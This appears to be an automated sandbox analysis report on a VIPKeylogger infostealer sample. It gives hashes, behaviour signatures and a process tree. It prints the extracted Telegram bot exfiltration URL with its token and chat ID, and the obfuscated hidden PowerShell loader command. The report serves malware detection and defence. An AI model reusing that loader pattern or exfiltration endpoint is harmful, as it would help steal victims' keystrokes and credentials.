Analysis
-
max time kernel
149s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
-
submitted
20-12-2024 06:36
General
-
Target
cee3ae54c0f49335db69551733260a6e0bb7f72089b126b14a09d44722bbdc8f.exe
-
Size
558KB
-
MD5
a30468384472782c5b2fc6a439f641bb
-
SHA1
2695582dda03035b463e939b1a2577505e9a2766
-
SHA256
cee3ae54c0f49335db69551733260a6e0bb7f72089b126b14a09d44722bbdc8f
-
SHA512
c2cee48e6c124cbcd2a09e0d0381f38d2602522a5b57577b039aaeb43e4611313c1865c00a98cabacd1edca8b43bbcbad0f6fbb8594c0c36bf4438c57708eaa4
-
SSDEEP
12288:g93jlsINtJD2SoxlyLpJdNLNrDv7ucLrv70:g93jlsyUSQ8LpJdNLNrjNPvY
Malware Config
Extracted
vipkeylogger
https://api.telegram.org/bot7557203423:AAGe1HpB3h500YMl-g1jm79Gu1CeWQ1Wrtg/sendMessage?chat_id=5434550993
Signatures
-
VIPKeylogger
VIPKeylogger is a keylogger and infostealer written in C# and it resembles SnakeKeylogger that was found in 2020.
-
Vipkeylogger family
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
-
Loads dropped DLL 1 IoCs
-
Blocklisted process makes network request 6 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
-
Drops file in Windows directory 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
-
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Suspicious behavior: EnumeratesProcesses 8 IoCs
-
Suspicious behavior: MapViewOfSection 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 23 IoCs
-
Suspicious use of WriteProcessMemory 7 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\cee3ae54c0f49335db69551733260a6e0bb7f72089b126b14a09d44722bbdc8f.exe"C:\Users\Admin\AppData\Local\Temp\cee3ae54c0f49335db69551733260a6e0bb7f72089b126b14a09d44722bbdc8f.exe"1⤵
- Loads dropped DLL
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -windowstyle hidden "$Eurylaimoid=gc -raw 'C:\Users\Admin\AppData\Roaming\china\Mixeren\verbalises\Southernise233.Bul';$Mistillidens63=$Eurylaimoid.SubString(10394,3);.$Mistillidens63($Eurylaimoid) "2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\SysWOW64\msiexec.exe"3⤵
- Blocklisted process makes network request
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1584 -s 23804⤵
- Program crash
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 1584 -ip 15841⤵
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
760B
MD5d9e8e0464dc55bf5f1211889719af5e2
SHA174822aae7ad9a83be53c405a23351bbe1a78cf90
SHA256e4af4340f4a7d89e44997bcd44f69621b211e9d31430bdc5d1909d7ad5bca419
SHA5128e4fc2255f8f0b9f5ca4f9f2d6fee5016425cf644029f4060526e7e14ab4a481fdc5393390e49e535456df9bd89b4eb28d88f64641dde7ba3494f5010d62917b
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
6KB
MD5b648c78981c02c434d6a04d4422a6198
SHA174d99eed1eae76c7f43454c01cdb7030e5772fc2
SHA2563e3d516d4f28948a474704d5dc9907dbe39e3b3f98e7299f536337278c59c5c9
SHA512219c88c0ef9fd6e3be34c56d8458443e695badd27861d74c486143306a94b8318e6593bf4da81421e88e4539b238557dd4fe1f5bedf3ecec59727917099e90d2
-
Filesize
325KB
MD5f53eeac9a2c8712c7783bdf13e401b2b
SHA1cfed633d70a8a260a8003f2164b4d1789d6be308
SHA2567af7afd5dafd279406fa57f31e56f4d92721423733a2fb32c0434b09bbce127c
SHA51250f9b78fa28a1d83cbaac44cdbc6110218b814faf91a1539ac1888e2167f7d66be5dd005d8d3eb8ded0dd34cbc7a03e062d62d01f151ddb9bfbda5bb40b6c70b
-
Filesize
68KB
MD51f45559fcfff86c51f4abda260d0b9b3
SHA1f8bb784bb245d615b755cd5d7b6344e3a6d9fad2
SHA2565e33b1687632ded7ba4a2e2c16e088f28faaa7308ffd5c4d8b022dfb049e91d2
SHA512d6fb73428e776c7094a1a217c7859ad43d276067b1fbf3ea5870fe20bffbeca1ad134a0d73a8c853db17f33d3000bb759316ed93e8910b86e53b7ec0e6162eae
-
Filesize
18.3MB
-
Filesize
18.3MB
-
Filesize
624KB
-
Filesize
296KB
-
Filesize
7.7MB
-
Filesize
40KB
-
Filesize
7.7MB
-
Filesize
136KB
-
Filesize
408KB
-
Filesize
408KB
-
Filesize
3.3MB
-
Filesize
120KB
-
Filesize
304KB
-
Filesize
600KB
-
Filesize
104KB
-
Filesize
136KB
-
Filesize
5.6MB
-
Filesize
6.5MB
-
Filesize
304KB
-
Filesize
7.7MB
-
Filesize
200KB
-
Filesize
7.7MB
-
Filesize
120KB
-
Filesize
652KB
-
Filesize
7.7MB
-
Filesize
6.2MB
-
Filesize
68KB
-
Filesize
56KB
-
Filesize
80KB
-
Filesize
104KB
-
Filesize
32KB
-
Filesize
168KB
-
Filesize
144KB
-
Filesize
7.7MB
-
Filesize
7.7MB
-
Filesize
7.7MB
-
Filesize
7.7MB
-
Filesize
4KB
-
Filesize
7.7MB
-
Filesize
7.7MB
-
Filesize
86.2MB
-
Filesize
7.7MB
-
Filesize
7.7MB
-
Filesize
7.7MB
-
Filesize
216KB
-
Filesize
4KB
-
Filesize
7.7MB
-
Filesize
7.7MB